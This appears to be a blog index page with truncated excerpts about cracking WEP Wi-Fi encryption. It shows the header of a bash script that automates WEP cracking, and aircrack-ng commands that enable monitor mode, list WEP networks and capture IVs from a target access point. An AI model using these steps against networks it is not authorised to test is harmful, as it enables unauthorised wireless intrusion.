ivs

I have wrote an automated WEP cracking script (matts-wepcrack.sh). Let me know if you have any improvements.

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134#!/bin/bash # wepcrack.sh v1.3 # Create by Matthew Phillips # New versions can be downloaded from www.phillips321.co.uk VERSION="1.3" # # This tool requires aircrack-ng tools to be installed and run as root # # ChangeLog.... # Version 1.3 - Randomises interface MAC address # Version 1.2 - Set txpower of card to 1000mw… Continue reading

Run the following in the first terminal window to create an interface in monitor mode called mon0 of interface wlan0 The second command shows WEP encrypted networks nearby The third command starts capturing traffic from your target

123airmon-ng start wlan0 #create interface man0 in monitor mode of wlan0 airodump-ng --encrypt WEP mon0 #shows APs with WEP only airodump-ng -c [channel] --bssid [mac_of_ap] --ivs -w [filename] mon0

Now open a second… Continue reading